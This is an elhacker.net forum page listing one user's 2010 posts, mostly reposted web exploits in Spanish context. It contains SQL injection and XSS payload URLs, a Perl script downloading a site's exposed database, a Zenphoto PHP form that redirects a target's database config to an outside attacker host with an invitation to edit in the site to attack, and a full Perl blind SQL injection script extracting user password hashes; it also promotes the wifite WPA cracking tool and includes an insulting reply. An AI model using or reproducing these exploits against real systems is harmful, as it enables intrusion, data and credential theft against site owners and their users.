elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Programación / Scripting / Re: [python]VideoTraining Aprende A Programar En Python desde 0 en: 28 Septiembre 2010, 04:19 am
Programando en pyhton - 11 Mas sobre listas y variables

12  Programación / Scripting / Re: [python]VideoTraining Aprende A Programar En Python desde 0 en: 28 Septiembre 2010, 04:18 am
      :D
13  Seguridad Informática / Hacking / TA-Mapper: Application Penetration Testing Effort Estimator en: 28 Septiembre 2010, 01:19 am
Se escribió acerca de esta herramienta en enero de 2009, cuando fue lanzado por primera vez, recientemente se ha convertido en v1.1 disponible para descargar.

El tiempo y asignador de ataque (también conocido como TA-Mapper) es una herramienta de estimación de esfuerzo para la evaluación de caja negra de seguridad (o prueba de penetración) de las aplicaciones. Esta herramienta proporciona una estimación más precisa cuando se compara con la estimación aproximada. probadores de penetración que siempre tienen dificultades para explicar / justificar los esfuerzos cargada (o se cita) a sus clientes pueden encontrar esta útil herramienta de poder calcular con mayor precisión los esfuerzos necesarios para el ensayo de penetración de aplicaciones.

¿Qué hay de nuevo en v1.1?

   1. El "Optimizar esfuerzo" opciones se proporciona para la corrección de avance / optimización de esfuerzos. Permite a los usuarios a optimizar aún más los esfuerzos por considerar los componentes de automatización como una parte del enfoque de la prueba.
   2. Informe se puede generar tanto en HTML y formato MS Excel (Más opciones de informe puedan surgir en la puesta en libertad más tarde)

Corrección de errores

    * Pocos errores cosméticos correcciones incluidas algunas cuestiones funcionales
    * Se ha solucionado el _silly_ valores de configuración personalizados seguido de actualización automática de los esfuerzos totales

Puede descargar TA-Mapper v1.1 aquí:

TA-Mapper%20v1.1.zip

Mas informacion aqui
14  Seguridad Informática / Nivel Web / Gokhun ASP Stok v1.0 Multiple Remote Vulnerabilities en: 27 Septiembre 2010, 00:39 am
Este otro se los dejo son varioos exploits para asp

Código:
============================================
Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
============================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.site.com/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========
 
http://[Victim]/?eylemD=urunler&olayD=&islemD=duzenle&kimlikD=1+union+select+0,1,name,ctelephone,4,5,6+from+customers+where+Kimlik=2
 
==================================
======= Cross Site Scripting =====
 
http://[Victim]/?eylemD=hizmetlerimiz&olayD=digerhizmetlerimiz%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
 
==============================
Remote Database DisClosure Exploit
==========================
 
 
#!/usr/bin/perl -w
#
# Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit
# Coded: KnocKout
# Date: 26.09.2010
# Thanks: DaiMon, BARCOD3
#
 
 
 
use LWP::Simple;
use LWP::UserAgent;
 
system('cls');
system('title Vural Portal 2010 Remote Database Disclosure Exploit');
system('color 4');
 
 
if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
 
print "\n************************************************************************\n";
print "\* Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* msn :   knockoutr[at]msn[dot]com                                 *\n";
print "\* Special Thankz : DaiMon                                      *\n";
print "\*********************************************************************\n\n\n";
 
($TargetIP, $path, $File,) = @ARGV;
 
$File="database/yb.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";
 
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");
 
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
15  Seguridad Informática / Nivel Web / MOAUB #26 - Zenphoto Config Update and Command Execute Vulnerability en: 27 Septiembre 2010, 00:33 am
Bueno les dejo este otro para utilizarlo solo cambian
$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
lo que esta dentro de " "
y ponen la url de el sitio web que van a atacar!
Código:
<?php
/*
 
  __  __  ____         _    _ ____
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/
 
Abysssec Inc Public Advisory
 
 
  Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
 
*/
 
 
$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>
 
<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
    By : Abysssec @ Inc <br>www.Abysssec.com<hr>
    <form method='POST' action='$path' >
    <input type=hidden name='mysql' value='yes'>
    <input type=hidden name='mysql_user' value='$new_mysql_user'>
    <input type=hidden name='mysql_pass' value='$new_mysql_pass'>
    <input type=hidden name='mysql_host' value='$new_mysql_host'>
    <input type=hidden name='mysql_database' value='$new_mysql_database'>
    <input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
    After click on below , if target will can connect to your Mysql_Host :<br>
    You Must view 'GO !' Messege ...<br>
    Click on & wait ....
    <br> Then , You need to set your admin user and password.<br><hr>
    Upload file:<br>
    you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
    <input type=submit value='Send Your Setting '>
    </form>
    ";
echo "</body></html>";
?>
16  Seguridad Informática / Nivel Web / Re: E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit en: 26 Septiembre 2010, 23:14 pm
tragantas jajja creo que no solo los comparto conlos demas y los documentamos en el foro no creo que aya problema con eso osi sinceramente no me importa si  tu vez mi rank o no ¿Acaso tu me das de comer o me das dinero como para que me importe tu opinion? entonces saquese a la verga morro!
17  Seguridad Informática / Seguridad / [Video]Como instalar tor y vidalia para navegar "anonimamente" en: 26 Septiembre 2010, 11:12 am
Les dejo mi humilde aporte de como instalar tor y vidalia en windows y hablo un poco sobre seguridad informatica y como funcionan los proxys espero les sirva a algunos saludos!

18  Seguridad Informática / Wireless en Linux / wifite – Mass Wifi WEP/WPA Key Cracking Tool en: 26 Septiembre 2010, 06:12 am


wifite es creado para atacar a varios cifrados WEP y WPA de redes al mismo tiempo. Esta herramienta se puede personalizar para ser automatizada con sólo unos pocos argumentos y se puede confiar para funcionar sin supervisión.

Características

    * Clases por el poder de las metas (en dB); más grietas puntos de acceso primero
    * Todos los apretones de manos son una copia de seguridad WPA (para wifite.py 's directorio de trabajo)
    * Opciones de mediados de ataque: parada durante el ataque con Ctrl C para utilizar (continuar, pasar al siguiente objetivo, pase a la ruptura, salida)
    * Numerosos filtros para especificar exactamente qué ataque (WEP / WPA / tanto, por encima de ciertos puntos fuertes de la señal, canales, etc)
    * Muy ajustes personalizables (tiempos de espera, los paquetes / seg, etc)
    * Apoyo SKA (no probado)
    * Encuentra dispositivos en modo monitor, si no se encuentra ninguno, le pide para la selección
    * Todas las contraseñas guardadas para log.txt
    * Conmutación ataques WEP no restablece IVS
    * Muestra resumen de la sesión en la salida; muestra las claves del agrietado

Descarga:

wifite
   
19  Seguridad Informática / Nivel Web / E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit en: 26 Septiembre 2010, 06:04 am
Código:
#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org
 
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
 
$^O eq 'MSWin32' ? system('cls') : system('clear');
 
print "
 
E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit
 
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
\r\n";
 
if (@ARGV != 4) {
    print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
    exit;
}
 
my $host    = $ARGV[0];
my $usr     = $ARGV[1];
my $pwd     = $ARGV[2];
my $anickde = $ARGV[3];
my $anick   = '0x'.EncHex($anickde);
 
print "[!] Logging In...\r\n";
 
my %postdata = (
    uname => "$usr",
    pass => "$pwd",
    op => "login"
);
my $cookies = HTTP::Cookies->new(
    autosave => 1,
);
 
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$ua->cookie_jar($cookies);
 
my $req     = (POST $host."/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;
if ($content =~ /<h4>Benvenuto su/i) {
    print "[+] Logged in!\r\n";
} else {
    print "[-] Fatal Error: username/password incorrect?\r\n";
    exit;
}
 
print "[!] Checking permissions...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host."/modules/eCal/location.php?lid=1+AND+1=1";
$ua->cookie_jar($cookies);
$request    = $ua->get($req);
$content    = $request->content;
if ($content !~ /<b>Eventi nella località: <\/b>/ig) {
    print "[+] Fatal Error: Access denied\r\n";
    exit;
} else {
    print "[+] You have permissions\r\n";
}
 
print "[!] Exploiting...\r\n";
my $i = 1;
my $pwdchr;
while ($i != 33) {
    my $wn  = 47;
    while (1) {
        $wn++;
        my $ua = LWP::UserAgent->new;
        $ua->agent("Mozilla 5.0");
        my $req     = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
        $ua->cookie_jar($cookies);
        my $request = $ua->get($req);
        my $content = $request->content;
        open LOGZZ, '>lol.html';
        print LOGZZ $content;
        close LOGZZ;
        if ($content !~ /<b>Eventi nella località: <\/b><a href='localleve\.php\?lid='>/ig) {
            my $cnt = $1;
            $pwdchr .= chr($wn);
            $^O eq 'MSWin32' ? system('cls') : system('clear');
            PrintChars($anickde, $pwdchr);
            last;
        }
    }
    $i++;
}
 
print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";
 
sub PrintChars {
    my $anick1 = $_[0];
    my $chars = $_[1];
print "
 
E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
 
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
 
[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] ".$anick1."'s md5 Password: ".$chars."
";
}
 
sub EncHex {
    my $char = $_[0];
    chomp $char;
    my @trans = unpack("H*", "$char");
    return $trans[0];
}
 
 
#[Unit-X] Vuln-X DB 2010.09.21
20  Seguridad Informática / Nivel Web / MOAUB #25 - VisualSite CMS v1.3 Multiple Vulnerabilities en: 26 Septiembre 2010, 06:04 am
Código:
'''
  __  __  ____         _    _ ____
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
 http://www.exploit-db.com/moaub-25-visualsite-cms-multiple-vulnerabilities/
 
'''
 
Abysssec Inc Public Advisory
 
 
  Title            :  VisualSite CMS Multiple Vulnerabilities
  Affected Version :  VisualSite 1.3
  Discovery        :  www.abysssec.com
  Download Links   :  http://sourceforge.net/projects/visualsite/
  Login Page       :  http://Example.com/Admin/Default.aspx
 
Description :
===========================================================================================     
  This version of Visual Site CMS have Multiple Valnerabilities :
        1- Logical Bug for Lock Admin's Login
        2- Persistent XSS in admin section
 
 
Logical Bug for Lock Admin's Login:
===========================================================================================   
 
  If you enter this values in Login Page (http://Example.com/Admin/Default.aspx)
  three times during five minutes , the Admin's login will be locked:
 
    Username : 1' or '1'='1
    Password : foo
   
 
  Vulnerable Code is in this file:
                ../App_Code/VisualSite/DAL.cs
  Ln 378:
                public static User GetUser(string username)
            {
                  User result = null;
                  DataTable matches = ExecuteRowset(String.Format("SELECT [ID], [Username], [Password], [LockedDate] FROM [User] WHERE [Username] = '{0}'", Sanitise(username)));
                  if (matches != null && matches.Rows.Count > 0)
                   {
                     ...
                   }
                  return result;
                 }
 
 
 
Persistent XSS in admin section:
===========================================================================================   
  In Edit Section which is accessible to Admin, it is possible to enter a script in Description field
  that only executed in the following path and never executed in other situations:
 
     http://Example.com/SearchResults.aspx?q={}
 
 
===========================================================================================
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines